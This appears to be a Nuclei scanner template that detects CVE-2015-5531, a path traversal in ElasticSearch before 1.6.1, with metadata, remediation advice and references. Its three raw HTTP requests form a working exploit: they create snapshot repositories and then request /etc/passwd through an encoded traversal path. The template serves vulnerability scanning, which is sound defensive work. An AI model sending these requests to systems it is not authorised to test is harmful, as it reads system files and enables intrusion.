id: CVE-2015-5531 info: name: ElasticSearch <1.6.1 - Local File Inclusion author: princechaddha severity: medium description: ElasticSearch before 1.6.1 allows remote attackers to read arbitrary files via unspecified vectors related to snapshot API calls. remediation: | Upgrade ElasticSearch to version 1.6.1 or later to mitigate the vulnerability. reference: - https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-5531 - https://nvd.nist.gov/vuln/detail/CVE-2015-5531 - http://packetstormsecurity.com/files/132721/Elasticsearch-Directory-Traversal.html - https://www.elastic.co/community/security/ - http://packetstormsecurity.com/files/133797/ElasticSearch-Path-Traversal-Arbitrary-File-Download.html classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2015-5531 cwe-id: CWE-22 epss-score: 0.97144 epss-percentile: 0.99745 cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 3 vendor: elasticsearch product: elasticsearch tags: vulhub,packetstorm,cve,cve2015,elasticsearch,intrusive http: - raw: - | PUT /_snapshot/test HTTP/1.1 Host: {{Hostname}} { "type": "fs", "settings": { "location": "/usr/share/elasticsearch/repo/test" } } - | PUT /_snapshot/test2 HTTP/1.1 Host: {{Hostname}} { "type": "fs", "settings": { "location": "/usr/share/elasticsearch/repo/test/snapshot-backdata" } } - | GET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body words: - ElasticsearchParseException - Failed to derive xcontent from - 114, 111, 111, 116, 58 condition: and - type: status status: - 400 # digest: 490a0046304402206a863bfd08b01963d2ef5d0c737209e040f4e222a83d55c0e79b840b1d9b2778022051bd22238cfaa9c8509f0f0d6ceae11c8b336fb5774cb66bae6f162de9f7436d:922c64590222798bb761d5b6d8e72950